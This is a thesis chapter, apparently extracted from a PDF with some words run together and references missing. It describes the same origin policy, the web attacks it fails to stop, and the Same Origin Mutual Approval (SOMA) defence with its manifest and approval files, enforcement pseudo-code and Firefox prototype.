The same origin policy we focus on in this thesis is enforced on all JavaScriptcode which is run within a web browser (we discuss alternate same origin poli-cies in Section It limits the ability of JavaScript to read from and modifyobjects retrieved from a different origin As each object is loaded, theorigin of the object is stored by the web-browser as a tag in the meta-data as-sociated with that object. We define the same origin policy as a restriction onthe ability for JavaScript tagged with one origin to read from or modify objectstagged with a different origin. In other words, JavaScript tagged with origin Ais not allowed to read data tagged with a different origin B (but can still displaythis data to the user). It also cannot modify data tagged with origin B (i.e., whatis displayed to the user is the same as what was received from the server B).
While JavaScript cannot modify data received by server B (because the origin isnot the same), it can obscure the data as it is displayed to the user (see SectionTable shows where the same origin policy applies. For each contenttype, the ability for JavaScript to fetch, read, modify, and execute the content isindicated. For those permissions denoted SO, JavaScript can only perform theoperation if the content is tagged as having the same origin as the JavaScriptattempting to perform the operation.
Content Type
Audio/Video (Plugins)
Audio/Video (HTML5)
Table 3.1. Current JavaScript access to content loaded by the web browser(e.g., JavaScript may always fetch images, but can only read or modify thecontents of an image if is tagged with the same origin (SO) as the JavaScriptattempting the operation).
1The contents of a style and JavaScript file can be determined by examining the effect they
have on the document after being interpreted by the browser. Style elements are embeddedinto the document, appearing as part of the DOM. Loaded JavaScript functions can likewise beexamined by other JavaScript code through the toString() method (unless the function hasbeen redefined to hide its previous functionality).
Chapter 3. Same Origin Mutual Approval Policy
In Table the ability to modify styles and JavaScript is not limited by
the same origin policy. Instead of being self-contained objects which loaded,tagged, and (potentially) displayed to the user, these two types of objects influ-ence the look of the whole page. A style file does this directly by dictating, foreach HTML element on the base page, how it should be displayed (e.g., mar-gins, text colour, borders, etc.). JavaScript, through access to the base HTMLpage, can also modify the look and feel of the page (and hence overwrite anystyle dictated by the style file).
In our example of Figure one of the objects loaded onto the page was
JavaScript code. In general, JavaScript code can be loaded in one of two ways,either through including it directly on the base HTML page, or through load-ing it as an external script file. While it is obvious that code embedded on thebase HTML page is tagged with the same origin as the page (as part of thatbase page), what is less obvious is the tagged origin of JavaScript code loadedthrough an external script. While in general, the tagged origin indicates the do-main name, port number, and protocol through which an element was fetched,an exception is made for JavaScript. All JavaScript on a page, regardless ofwhere it was originally loaded from, is tagged with the origin of the base HTMLpage. In tagging all JavaScript with the same origin as the base HTML page,all JavaScript has permission to read and modify to the base page, but not toother elements tagged with a different origin. Because all JavaScript is taggedwith the same origin, any JavaScript loaded can redefine any function. This isthe case even if the function was previously defined by a JavaScript source filewhich came from different origin.
The HTML iframe tag is a special element which can be used to embed one
complete web page within another. It can be thought of as allowing a new baseHTML page within another page. All elements (including JavaScript and styles)referenced inside the iframe affect the iframe instead of the base HTML pagewhich contains the iframe. If the iframe element is tagged with a differentorigin than the base HTML page, the same origin policy applies, preventing thebase HTML page from reading content, modifying content, sending messages,and reading replies from the iframe. Similarly, the content in the iframe cannotread, modify, or send messages to the base HTML page. The exception to thisrule is if the base HTML page and HTML page inside the iframe came fromdifferent sub-domains within the same base domain (e.g., ca.example.org andrp.example.org). In this case, content from the sub-domains is allowed tocommunicate if and only if they both indicate their explicit desire updating thetagged origin through setting the JavaScript variable document.domain to thesame common prefix (i.e., example.org).
Document Object Model
The Document Object Model (DOM) is the representation of the base HTMLpage which is made available to JavaScript It allows JavaScript to readand modify the base HTML content, as well as content referred to by the baseHTML page (subject to the constraints of the same origin policy). It also allowsJavaScript to associate event handlers with events that are triggered by theuser interacting with the HTML elements (e.g., onclick or onmouseover). Wechoose not to tie the JavaScript same origin policy to Document Object Model(DOM) access in this thesis because it is possible to load content from a dif-ferent origin without inserting it into the DOM, as illustrated in Figure The JavaScript same origin policy restricts access to objects loaded by the webbrowser, regardless of whether they have been inserted into the DOM. In im-plementing SOMA, we extend policy dictating the fetching of content beyondJavaScript, going beyond the DOM interface.
var pic = new Image ( ) ;
* Assigning a value to pic . src causes the browser
to fetch the image .
pic . src = "http://example.com/image.png" ;
Figure 3.3. Load an image without inserting it into the DOM.
Application of the Same Origin Policy
The same origin policy restricts JavaScript's ability to read and modify objectsthat have been fetched by the browser. In Figure JavaScript on base HTMLpage A can read and modify object B, since it comes from the same server(server 1). JavaScript on base HTML page A cannot read or modify C, sinceit came from server 2. The same origin policy also restricts the ability to readand modify objects associated with other windows (or tabs) which may be openconcurrently by the browser. In Figure JavaScript on base HTML page Ashould not be able to read or modify base HTML page D, or the objects E andF .
Asynchronous JavaScript calls (AJAX) result in the contents of an object be-
ing returned directly to JavaScript (instead of being treated as a distinct objectby the browser). Because JavaScript can read and modify content returned asthe result of an AJAX request, these requests are limited by the browser tobeing performed only to the origin of the base HTML document.
As discussed in all JavaScript loaded on a page inherits the origin
of the base page. All JavaScript therefore has full access to the base page
Chapter 3. Same Origin Mutual Approval Policy
Figure 3.4. A pictorial representation of two different web pages being displayedin a browser concurrently. Page A is from server 1 and includes objects B (alsofrom server 1) and C (from server 2). Page D is from server 3, and includesobjects E (from server 2) and F (from server 3).
and any objects embedded on it that came from the same origin as the basepage. Mashups involve combining content (including JavaScript) from manydifferent sources on a single web page With the introduction of mashups,the desire to restrict the access of JavaScript to content (and other JavaScript)coming from the same origin has become an issue. We choose to focus on thecurrently exploited attack vector of communication between the browser andexternal servers in this thesis.
Benefits of the Current Same Origin Policy
By limiting the ability to read and modify content tagged with a different origin,many web attacks are prevented. The same origin policy prevents an attackerfrom performing the following attack (which we term a fetch-parse-fetch attack)in JavaScript: 1) Load an HTML page (or other object) from a different origin.
2) Parse the contents. 3) Craft a subsequent request to the other origin basedon the parse result. This restriction is important, as it blocks an attacker fromimplementing in JavaScript any multi-step attack which relies on the result ofa previous request to any web server (other than that with the same origin asthe JavaScript) in generating the next request to that server. The results of arequest can not be read (and hence parsed) in JavaScript if they came from adomain other than the origin of the base HTML page; therefore the informationrequired to make a subsequent request based on the first results is not madeavailable to the attacker's JavaScript.
The restrictions imposed by the same origin policy are critical to the security
of JavaScript and the success of the web. Being able to run code on someoneelse's computer is an inherently dangerous operation. Many have recognizedthe harm that could come to the host from running arbitrary JavaScript codeand hence have implemented strong sandbox mechanisms in an effort to limitthe damage that can be caused by potentially malicious JavaScript code. Theother target that can be attacked by JavaScript code running at a host, however,is other servers hosting web sites. Given that all requests to remote sites madeas a result of JavaScript running in a browser can not be easily tied to thesource of the JavaScript by the server receiving the request, JavaScript withoutthe same origin policy would allow the formation of very powerful distributedbotnets. This would allow attackers to attack other web sites indirectly The design of the same origin policy attempted to keep the JavaScript codeassociated with a web application from interfering with other sites. In doingthis, they prevented attackers from offloading fetch-parse-fetch attacks againstother servers on unsuspecting clients. While not all attacks were prevented bythe same origin policy, there is still a substantial benefit having it in effect.
Limitations of the Same Origin Policy
The design of the same origin policy attempts to limit damage JavaScript cando to remote servers when running in the browser. It does not stop all attacksRemaining attacks rely on the fact that many damaging activities can beperformed without being able to read the response (i.e., in attacking a webserver application, it is sufficient to simply send a malicious request). We nowdiscuss some of the web attacks which are currently prevalent and why thesame origin policy does not protect against them. For many of these attacks,there exist many different and inconsistent definitions
Typically, a cross-site scripting attack is carried out as illustrated in Figure The attacker will send the malicious content to the target server, which willreplay the content to a user as part of a web page it sends. A cross-site scriptingvulnerability is the result of improper sanitization of input received from usersof the site by a server before the server uses it as output A single HTML file can contain a mix of JavaScript code, HTML elements, andtext; with the transition between each within the file being determined by theparser. If an attacker can modify the parse tree generated from the HTMLfile in ways not intended by the web site developer (e.g., turning what wassupposed to be text into code, or inserting HTML elements not intended), then
Chapter 3. Same Origin Mutual Approval Policy
a cross-site scripting vulnerability exists
Figure 3.5. A cross-site scripting web attack.
The malicious input which exploits a cross-site scripting vulnerability can
either be uploaded and stored on the server (e.g., a blog post stored on a serverand shown to everyone viewing the blog) and continue to be sent to users longafter the attack has taken place, or it can be passed as a parameter (e.g., asearch request) to a dynamic page generated by the web server and returnedto a user. Both of these methods of exploit result in additional content providedby the attacker being embedded in the web page served.
A cross-site scripting attack is not prevented by the same origin policy be-
cause there is no requirement for JavaScript to read or modify data tagged witha different origin. The malicious content sent to the server by the attacker issimply reflected as part of the resulting web page that the server sends to theclient.
Cross-Site Request Forgery
A cross-site request forgery attack involves a malicious web server sending to aclient browser a page that has embedded content designed to create requeststo the target web server. The attack is illustrated in Figure In general, theattack involves interaction with other sites that the user may use at the sametime as they are viewing the malicious web page
The server serving the malicious web page need not be intentionally mali-
cious. It is sufficient to compromise an otherwise benign server through attackssuch as cross-site scripting (discussed in Section While it is common tosee the malicious content take the form of JavaScript, it does not have to. An im-age tag on the attacker provided page referencing the target URL is sufficientto cause the browser to perform the request (even if the image tag URL doesnot actually point to an image). Any object pointed to by the attacker providedpage will cause the browser to perform the request. More complex versionsof the attack will craft the target URL in JavaScript, allowing the web site toperform POST as well as GET requests to the target server.
Figure 3.6. A cross-site request forgery attack.
Browsers, by design, submit cookies from a particular web server when
sending another request to that same server. One common use of cookies isfor storing session information, identifying a user logged onto a web site. Be-cause all related cookies are sent with any web request to the target server,a request sent as a result of the malicious web page (even if that web page ishosted on a different origin) will also contain the appropriate cookies identify-ing a legitimate user. This feature makes the cross-site request forgery attackmore dangerous to users.
The current JavaScript same origin policy does not prevent against cross-
site request forgery for two reasons: 1) The request to the target server doesnot have to be performed by JavaScript, and 2) If JavaScript does perform therequest, it does not need to be able to process the response (as simply makingthe request is enough to cause the damage). As discussed in Section thesame origin policy does not limit the ability to make requests.
The clickjacking attack (also referred to as UI redressing and not to be con-fused with click fraud attempts to convince the user to perform someaction against a target site while making it appear as though the action is be-ing performed on some other unrelated site. Sections of the web page deliveredto the browser by the target server are obscured by content from the malicioussite, leaving visible only those target page elements the attacker wishes theuser to see or interact with In hiding content from the target web page,the malicious site may be able to persuade the user to perform an otherwiseunwanted task.
Since elements of the target page are not modified or read by JavaScript
(they are instead covered up by the attacker), the JavaScript same origin policy
Chapter 3. Same Origin Mutual Approval Policy
Figure 3.7. A clickjacking attack.
does not protect against this attack. The clickjacking attack is similar to thecross-site request forgery attack discussed in Section in that it results inundesired web requests to the target server.
Figure 3.8. An information stealing attack.
The goal of an information stealing attack, as illustrated in Figure is
to send sensitive information to an attacker-controlled server Maliciouscontent is injected onto a web page (e.g., through a cross-site scripting attack)which contains (or collects) sensitive information the attacker is interested in(e.g., authentication cookies, passwords, user names, account details, etc.).
This malicious content can be inserted as the result of a cross-site scriptingattack (Section or other attack. The malicious JavaScript examines ele-ments in the DOM of the page (e.g., form fields, and cookies) to obtain sensitivedata (because both the malicious JavaScript and sensitive data originate fromthe same origin, the malicious JavaScript has read access). The JavaScript then
3.2. The Protection Mechanism
sends this sensitive information to an attacker controlled server (similar to Sec-tion
Figure 3.9. A bandwidth stealing attack.
While not strictly a classic security threat, the bandwidth stealing attack
illustrated in Figure uses the resource a victim has paid for or otherwiseobtained without properly compensating them Usually, this attack takesthe form of showing images or multimedia from a victim website without alsoshowing advertisements designed to fund the continual operation of the site. Inthe extreme, a bandwidth stealing attack leads to a distributed denial of serviceattack on the victim server, due to a potentially high volume of traffic.
The Same Origin Policy as a Guardian MAC
The JavaScript same origin policy does not rely on the user for enforcement andis applied uniformly to all developers who create web applications. It is thus aguardian mandatory access control. Even though the same origin policy (dis-cussed in Section does not protect against all web-based attacks, thereare still significant security advantages (as discussed in Section whichmake the same origin policy worthwhile.
The Protection Mechanism
Published in 2008, the Same Origin Mutual Approval (SOMA) policy isdesigned to strengthen the same origin policy. It does this by addressing the
Chapter 3. Same Origin Mutual Approval Policy
lack of access control surrounding fetching external content. While the sameorigin policy focuses exclusively on restricting the ability for JavaScript to readand modify any object tagged with a different origin, the ability to fetch con-tent from servers is unrestricted, leading to those attacks discussed in SectionWhile the ability to read and modify content programmatically is specificto JavaScript, content can be fetched as a result of a number of different oper-ations. SOMA restricts fetches regardless of how they are initiated, be it as theresult of a JavaScript operation, HTML tag, or style tag.
Being a guardian MAC, SOMA is designed to be enabled by site administra-
tors and enforced by the browsers, beyond the direct control of web developers.
At the browser end, the policy is enforced transparently by any web browserunderstanding SOMA.
Threat Model
Our threat model for SOMA is the same as was presented in the 2008 workWe assume that site administrators have the ability to create and controlthe content associated with top-level URLs (static files or scripts) and that webbrowsers will follow the policy specified at these locations correctly. In contrast,we do assume that the attacker controls arbitrary web servers and can injectcontent on legitimate servers through attacks such as cross-site scripting. Weassume attackers are not able to alter policy files or software on legitimateservers. A goal of SOMA is to restrict communication with a malicious webserver when a legitimate web site is accessed, even if the content on that site orits partners has been compromised. A related goal is to restrict communicationwith a legitimate web server when the user is browsing pages from an attackercontrolled server.
By these assumptions, SOMA is not designed to address situations where
an attacker compromises a web server to change policy files, compromises aweb browser to circumvent policy checks, or performs man-in-the-middle at-tacks to intercept and modify communications; nor the problem of users visit-ing malicious web sites directly, say as part of a phishing attack. While theseare all important types of attacks, by focusing on the problem of unauthorizedcommunication between web servers and the browser, SOMA creates a simple,practical solution that works toward addressing all threats discussed in Sec-tion Mechanisms to address other threats (e.g., Blueprint and theOrigin header largely complement rather than overlap with the protec-tions of SOMA.
3.2. The Protection Mechanism
SOMA is composed of two parts working together to provide the mutual ap-proval aspects of SOMA. The first part we discuss is the SOMA manifest. Thisis a file fetched from the same server A as the base HTML page. It lists allservers which A authorizes as sites from which objects may be fetched duringthe process of building and rendering any HTML page served by A. The ideaof restricting communication to a few listed external servers is borrowed fromTahoma Any server hosting objects that are referenced (either directly orindirectly) and loaded during the course of viewing the page must be listed insite A's SOMA manifest file. Any server origin not listed will not be contactedduring loading of the page – any requests for objects from the unlisted originwill return an error. By convention, we assume the origin of the base HTMLpage is implicitly included in the SOMA manifest. We use the notation AAB toindicate that the base page origin A authorizes that B be contacted during thecourse of viewing the base page which came from A. If A does not authorizecommunication with B during the course of viewing a web page (i.e., B is notlisted on a SOMA manifest coming from A), then we denote this ACB.
As a standard, the paper proposed that the SOMA manifest always be lo-
cated on any given server at /soma-manifest For a base HTML pagefetched from the complete URL to the associatedSOMA manifest would be The ac-tual manifest would contain a header line identifying the file as containing aSOMA manifest, followed by zero or more lines dictating other origins (recall,from Section that an origin is defined as protocol, DNS name, and port)which can be contacted while rendering or viewing the page. See Figure
Figure 3.10. A sample SOMA manifest file for www.example.com.
If the origin of the base page chooses not to implement SOMA manifests,
the request for /soma-manifest will result in an error (e.g. 404 - file not found)being returned by the server, or a file which is not a SOMA manifest (i.e., doesnot contain a valid SOMA manifest header) being returned. For backward com-patibility, no request for content will be blocked if the SOMA manifest does notexist. Table indicates the possible scenarios.
Chapter 3. Same Origin Mutual Approval Policy
All origins can be contacted
Exists, is invalid
All origins can be contacted
Exists, is valid, and does not list B
B cannot be contacted
Exists, is valid, and lists B
B can be contacted
Table 3.2. SOMA manifest scenarios while browsing a page with base originA and included content from origin B.
The second part of SOMA involves querying all domains hosting objects refer-enced by the page which is being viewed in the browser. SOMA queries eachdomain other than the origin, for permission to fetch the content referenced bythe page. The approach is similar to the Adobe Flash crossdomain.xml butdiffers in that SOMA returns a single YES or NO response for any given queryinstead of a list of origins which are allowed to include the content. Returninga single YES/NO response prevents the easy disclosure to an attacker of all sitesauthorized by a particular origin. We choose to return a list as opposed to aYES/NO response for SOMA manifests because similar information can easily begleaned in most cases by parsing the base HTML page for a list of references.
We use the notation BBA to indicate that B allows its objects to be fetchedfor inclusion on base pages originating from A. If B does not wish to have itscontent fetched while a browser is rendering a page from A, we denote this asBDA.
print "SOMA approval n" ;
$policy = array (
'www.example.com' => 'YES' ,
'www.example.org' => 'YES' ) ;
print $policy [$_GET[ 'd' ] ] ;
Figure 3.11. Source code for a simple SOMA approval script.
To indicate that A is authorized by B to include objects from B on its web
pages, B needs to provide a script accessible which will answer YES when
3.2. The Protection Mechanism
queried with the domain A. As a standard, we propose that the actual queryto B be for the /soma-approval script and the appended key-value pair be thekey d and the value which is the domain for which approval is being sought. Fora request for approval from www.example.net to have its content embedded inpages coming from www.example.com, the complete URL of the SOMA approvalrequest would be A simple SOMA approval script which would respond to such requests isillustrated in Figure
If the administrator of the server hosting the content which is to be em-
bedded in pages chooses not to implement SOMA, the SOMA approvals scriptwill not exist and the server will return a 404 (file not found) or some othererror for any approval request. If the server administrator chooses to use the/soma-approval script for an unrelated purpose, the header line will not beSOMA approval and the browser should treat this the same as an error re-sponse. In both cases, we assume that the administrator of the server fromwhich the content is being fetched for inclusion allows the fetches to take place(so the default is backwards compatible). Table lists the possible scenarioswhen attempting to fetch a SOMA approval.
Objects can be embedded on any page
Exists, is invalid
Objects can be embedded on any page
Exists, responds with NO
A's pages cannot embed B's objects
Exists, responds with YES
A's pages can embed B's objects
Table 3.3. SOMA approval scenarios while browsing a page with base originA and included content from origin B.
The Combination of Manifests and Approvals
One of the design features of SOMA is that it enforces mutual approval forcontent inclusion on a web page. If either the administrator for the base pageorigin or the administrator for the included content origin state that they disal-low objects being fetched, then the SOMA-supporting browser will honour thisand refuse to fetch the objects. Only if both parties agree is content fetched andincluded into a web document. Table indicates the different possibilities andwhen the content is actually fetched.
Chapter 3. Same Origin Mutual Approval Policy
Objects are not fetched from B
Objects are not fetched from B
Objects are not fetched from B
Objects are fetched from B
Table 3.4. SOMA manifest and approval combinations while browsing a pagewith base origin A and included content from origin B.
The pseudo-code process a browser actually follows in fetching a complete
page when SOMA is being enforced is shown in Figure The pseudo-codeillustrates the parallelizable nature of SOMA-related requests. When building aweb page in the browser with SOMA enabled, the base HTML page and SOMAmanifest are fetched in parallel. Then, for each element from a different originreferenced by the base HTML page, a SOMA approval request is sent. Onlywhen an affirmative answer is received to the SOMA approval request is theactual request for the object sent to the remote server.
SOMA provides some protection against the current web threats as discussedin Section The approach does not rely on end-users to know anythingabout the policy, or that they be involved in enforcement of the policy. Thisis accomplished through building the enforcement mechanism directly into thebrowser, similar to how the JavaScript same-origin policy works. We do notrecommend a potential extension to the core SOMA approach that would allowend-users to modify either the SOMA manifest or approval responses.
SOMA policies are set up by system administrators who maintain the web
servers as opposed to developers who write web applications. In separatingSOMA policy from the web application development, we remove control fromthe web developers and place it in the hands of the system administrator. Theunderlying idea here is that the system administrator likely has more of a vestedinterest in the security of their web site than the developer of the web applica-tion, who may be disconnected from the environments it may be used in. Wenow discuss several other advantages.
function origin ( URL ) {
return URL. proto + URL. domain + ':' + URL. port + '/' ;
function buildPage ( URL ) {
object approvals = array ( ) ;
object manifest = async_fetch ( origin (URL) + 'soma-manifest' ) ; 7object base = sync_fetch ( URL ) ;
while ( size_of ( base . unfetched_objects ) != 0 ) {
* Process each object referenced by the base page * /
curobj = unqueue( base . unfetched_objects ) ;
* Does the manifest allow us to talk to the server? * /
wait_for ( manifest ) ;
i f ( manifest . allows ( origin ( curobj .URL) ) == 'NO' ) {
curobj . data = NULL;
i f ( approvals [ origin ( curobj .URL) ] . inProcess ( ) ) {
* Waiting for approval response , check back l a t e r . * /
queue( base . unfetched_objects , curobj ) ;
} e l i f ( approvals [ curobj .URL. domain ] . allowed ( ) == 'YES' ) {
* Server allows i t s content to be embedded. * /
curobj . data = async_fetch ( curobj .URL ) ;
} e l i f ( approvals [ curobj .URL. domain ] . allowed ( ) == 'NO' ) {
* Server does not allow i t s content to be embedded. * /
curobj . data = NULL;
* Query server − Can i t s content can be embedded? * /
approvals [ origin ( curobj .URL) ] =
async_fetch ( origin ( curobj .URL) + 'soma-approval?d=' +
base . domain ) ;
* Requeue request u n t i l we get our approval answer * /
queue( base . unfetched_objects , curobj ) ;
Figure 3.12. Pseudo-code for the browser SOMA enforcement process.
Chapter 3. Same Origin Mutual Approval Policy
The lack of a SOMA manifest file defaults to a blanket accept (and likewise thelack of a SOMA approval script defaults to allowing the fetch). With lack ofa SOMA policy being interpreted as an allow, any site choosing not to imple-ment SOMA will continue to work as it does currently. Because SOMA doesnot replace the JavaScript same origin policy but instead expands it, securityis not reduced compared to the current web if one chooses not to use SOMA.
For browsers not implementing SOMA, SOMA manifest or approval files willsimply not be accessed on the server. For these browsers, again the web willcontinue to work as it currently does. Only when both the server and browsersupport SOMA will the protections start to be enforced. This approach allowsincremental deployment with incremental benefit.
In dictating that the first line of a SOMA manifest or approval response be a
header containing "SOMA manifest" or "SOMA approval", we can differentiatebetween responses from servers not understanding SOMA but responding withgeneric response pages, and those servers understanding and responding toSOMA requests.
Complete SOMA protection is composed of three elements: a browser en-
forcing SOMA, a SOMA manifest file at the base page origin, and a SOMAapproval file for each domain contacted during the course of rendering a webpage. If the browser does support SOMA but a manifest does not exist at thebase site, the SOMA enabled browser will still query the SOMA approval scriptassociated with each object included on the web page and adhere to the re-strictions returned by the script. Likewise, a base origin distributing a SOMAmanifest will have its protections enforced regardless of whether the includedservers provide a SOMA approvals file. While it is possible to deploy SOMAmanifests without SOMA approvals (or vice-versa), deploying both providesmaximum benefit.
We now discuss some limitations of the SOMA approach.
Third Party Advertisements
Ad syndication involves allowing an advertiser to sell advertising space to otheradvertising companies. Under SOMA, if site A decides to sell advertising spaceon its site to advertiser B, then site A will typically list B on its SOMA manifest.
Likewise, B will indicate that A is allowed to embed its content in the SOMAapprovals script. If advertiser B turns around and wants to sell its space on siteA to C, then C will not be listed in the SOMA manifest for A and hence SOMAwill not allow its content to load. In such a case, A must either add C to theSOMA manifest, allowing content from C to appear on the page coming fromA, or B must somehow proxy the data so that all ads appearing on the site stillcome from B (even though B has sold the advertising space to C). Unless Bsets up a proxy so that it appears all content being included on the page hostedby A comes directly from B, the presence of a SOMA manifest on A will resultin B being restricted in their ability to perform ad syndication.
We do not see the limitation on ad syndication as being a negative limitation
of SOMA. Indeed, the practice of ad syndication has contributed significantly tothe rise in ad delivered malware. In fact, multiple levels of ad syndication areused in 75% of all ad delivered malware The practice of using multiplelevels of ad syndication is made difficult through the introduction of SOMA.
SOMA is designed to improve the same origin policy by imposing further con-straints upon external inclusions and thus external communications. It does notprevent attacks that do not require external communications such as code andcontent injection. SOMA can restrict outside communication frequently seen incurrent attack code
SOMA does not stop attacks to or from mutually approved communication
partners. In order to avoid these attacks, it would be necessary to imposefiner grain control or additional separation between components. This sort ofprotection can be provided by the mashup solutions described in Section albeit at the cost of extensive and often complex web site modifications.
SOMA cannot stop attacks on the origin where the entire attack code is
injected, if no outside communication is needed for the attack. This includesattacks such as web page defacement, some forms of cross-site scripting, orsandbox-breaking attacks intended for the user's machine. Some complex at-tacks might be stopped by size restrictions on uploaded content. More subtleattacks might need to be caught by heuristics used to detect cross-site script-ing. Some of these solutions are described in Section
SOMA cannot stop attacks from malicious servers not including content
from remote domains. These would include phishing attacks where the legiti-mate server is not involved.
Chapter 3. Same Origin Mutual Approval Policy
Self-Contained Malicious Servers
If a malicious server does not serve web pages that rely on non-maliciousservers in order to perform an attack (e.g., the malicious server simply hostsa phishing attack where all images and other data originate from the attackerand the data obtained from phishing is sent back to the attacker), then SOMAwill not help. SOMA is designed to limit communication in the scenario whereat least one of the servers involved is non-malicious.
Extensions to the Core Approach
While the core SOMA approach goes a long way to improving the security ofthe web over the same origin policy, there are still improvements that can bemade over the core approach.
Third Party Provided Manifests and Approvals
The core idea relies on every server who wishes to take advantage of the pro-tections offered by SOMA to host either a manifest file, approvals script, orboth on their servers. There may be, however, sites that would greatly benefitfrom the deployment of SOMA even if the site administrator is slow to adoptthe technology. In this case, it becomes beneficial for an external third party tobe able to host manifest files and approval scripts on behalf of the site which isto be protected by SOMA.
To support the use of third party SOMA manifest and approval servers while
still not requiring the end-user to administer the scheme, a specific site could bechosen to host these files (e.g. This server would be taskedwith responding with the correct SOMA manifest file given the base origin (in-cluding protocol, DNS name, and port) and respond to any SOMA approvalrequest (again, given the base domain and included content origin). One wayof accomplishing this is with a directory structure that includes the protocol,host name, and port as elements. As an example, a request for a SOMA mani-fest for from the third party would be translated bythe browser into a request for The same approach can be used for the SOMA approval re-quests, where a request for a SOMA approval from for content inclusion on a base page from would be translatedby the browser to a request for Like with a request for a SOMA approval
3.5. Extensions to the Core Approach
or manifest file directly from the site, an error response from the third partyserver would initiate the fallback of allowing all fetches.
If sites were to continue to implement SOMA, the situation is likely to occur
where a SOMA manifest (or approval) is hosted on both the directly involvedsite as well as the third party. When this situation occurs, we stipulate that theSOMA manifest (or approval) on the real site should be followed as opposed tothat hosted on the third party site.
Protocol and Port in the Approval Script
The core SOMA approach does not send the protocol or port to the SOMA ap-proval script when asking for approval to include content on a page from adifferent origin. While at this point we see no reason why the port or protocolwould be required by the approval script, the design of the interface to the ap-proval script makes expansion to deal with these attributes trivial. Additionaloptions (mainly, t=<protocol> and p=<port>) can be appended to the SOMAapproval request (e.g., for an approval request from approving the request would be As an opti-mization, if the protocol is using the standard port, the port number can beomitted in the SOMA approval request.
SOMA Implemented in HTTP Headers
In our proposal, a request for a SOMA manifest is done in parallel with a requestfor the main page. A request for a SOMA approval needs to be done before therequest for the subsequent content from the server. The reasons for this aretwo-fold.
1. By separating the manifest (and approval) from the object being returned
(i.e., either the base page or included content), a different cache policy canbe set for each by the web server administrator. As an example, the basepage may change frequently while the SOMA manifest does not change.
By separating the two, the cache lifetime of the SOMA manifest or ap-proval can be set such that it does not need to be retransmitted alongsideeach request for a new object from the same web server.
2. By separating the SOMA manifest and approval requests from the request
for actual content, the web developer does not need to ensure that their
Chapter 3. Same Origin Mutual Approval Policy
web application always sends a manifest or approval response alongsidethe desired object. One of the goals of SOMA is to place control of man-ifests in the hands of the server administrator, not the web developer.
While the request for the object could be separated from the SOMA man-ifest/approval request by the web server, the implementation of such ap-proach is more involved than simply making a /soma-manifest file avail-able.
Because one of the benefits of the SOMA approval is that it protectsagainst cross-site request forgeries (see Section one must ensurethat the actual request is not received by the web application running onthe server until after the SOMA approval has been granted. To ensurethat the SOMA approval is processed before the request for the content,we separate the two.
While the implementation of SOMA as HTTP request/response headers can
potentially lead to performance improvements due to a reduction in the num-ber of round-trips required to load a web page, the implementation of such anapproach should be designed with care. Should one decide to implement SOMAas HTTP headers alongside the traditional object request, we suggest that theprocessing of SOMA related headers be performed by the core web server (e.g.,Apache), not the web application running alongside the web server. In doingthis, web developers remain shielded from having to properly process and re-spond to SOMA related requests.
A Prototype Implementation
In order to test SOMA, we created an add-on for Mozilla Firefox 2.0, licensedunder the GNU GPL version 2 or laterIt can be installed in an unmodifiedinstallation of Mozilla Firefox the same way as any other add-on: the user clicksan installation link and is prompted to confirm the install. If they click the installbutton, the add-on is installed and begins to function after a browser restart.
The SOMA add-on provides a component that does the necessary verification
of the soma-manifest and soma-approval files before content is loaded.
Since it was not possible to insert test policy files onto sites over which we
had no control, we used a proxy server to simulate the presence of manifest andapproval files on popular sites. We now discuss the deployment costs, any com-patibility problems encountered, performance, and protection against currentweb attacks.
3.6. A Prototype Implementation
The browser, the origin sites, and content inclusion provider sites all bear thecosts in deploying SOMA. Note that unlike solutions that rely heavily upon userknowledge (e.g., the NoScript add-on for Mozilla Firefox SOMA requiresno additional effort on the part of the user browsing the web site. Instead,policies are set by server operators, who are expected to have more informationabout what constitutes good policy for their sites.
Deployment in the Browser
The SOMA policy is enforced by the web browser, so changes are required inthe browser. The prototype SOMA implementation, as used in the paper wasdeployed as an add-on. The prototype SOMA add-on, when prepared into thestandard XPI package format used by Mozilla Firefox, is 16kB. Uncompressed,the entire add-on is 18kB. The component that does the actual SOMA mutualapproval process is 12kB. The SOMA add-on prototype provides a persistentvisual indication that it is loaded in the bottom-right corner of the browserwindow. This visual cue was used during the development of the prototype, butcould be hidden on production deployments of SOMA.
Deployment on Origin Sites
Each origin server that wishes to benefit from the protections of SOMA needsto provide a soma-manifest file. This is a text file containing a list of content-providing sites from which the origin wishes to allow included content. Asmentioned earlier, each origin is specified by a domain name, protocol and(optionally) port.
This list can be determined by looking at all pages on the site and compil-
ing a list of content providers. This could be automated using a web crawler,or done by an admin who is willing to set policy (it is possible that sites willwish to set more restrictive policy than the site's current behaviour). In thepaper the main page on popular sites was examined to determine the ap-proximate complexity of manifests required. The PageStats add-on to loadthe home page for the global top 500 sites as reported by Alexa and exam-ined the resulting log, which contains information about each request that wasmade. On average, each site requested content from 5.45 domains other thanthe one being loaded, with a standard deviation of 5.3. The maximum numberof content providers was 32 and the minimum was 0 (for sites that only loadfrom their own domain).
Of course, a site's home page may not be representative of its entire con-
tents. As a further test, the paper documents the traversal of large sections of
Chapter 3. Same Origin Mutual Approval Policy
a major Canadian news site The number of domains needed inthe manifest was approximately 45; this value was close to the 33 needed forthat particular site's home page.
Given the remarkable diversity of the Internet, sites probably exist that
would require extremely large manifest files. Cursory exploration documentedin the paper, however, gives evidence that manifests for common sites would berelatively small.
Deployment on Content Provider Sites
Content providers wishing to take advantage of SOMA need to provide either afile or script that can handle requests to soma-approval. The time needed tocreate this policy script depends heavily upon the needs of the site in question,and may range from a simple yes-to-all or no-to-all to more complex policiesbased upon client relationships. Fortunately, simple policies are likely to bedesired by smaller sites (which are unlikely to have the resources to createcomplex policies), and complex policies are likely to be required only by largermore connected sites.
Many sites will not wish to be external content providers and their needs will
be easily served by a soma-approval file that just contains NO. Such a configu-ration will be common on smaller sites such as personal blogs. It will also becommon on high-security sites such as banks, who want to be especially carefulto avoid cross-site request forgery and having their images used by phishingsites (phishing sites can still copy over images as opposed to linking to theoriginal image).
Other sites may wish to be content providers to everyone. Sites such as
Flickr and YouTube that wish to allow all users to include content will prob-ably want to have a simple YES policy. This is accomplished by either havingsoma-approval always return YES, or by not hosting a soma-approval file (asthe default is YES).
The sites requiring the most configuration are those who want to allow some
content inclusions rather than all or none. For example, advertisers might wantto provide code to sites displaying their ads. The domains that need to be ap-proved can be determined using the list of domains already associated witheach clients profile. This database could then be queried to generate the ap-proval list. Or a company with several web applications might want to keepthem on separate domains but still allow interaction between them. Again, thenecessary inclusions will be known in advance and the necessary policy couldbe created by a system administrator or web developer.
The paper documents the overhead of soma-approval requests by using
data from the top 500 Alexa sites 3244 cases in which a content provider
3.6. A Prototype Implementation
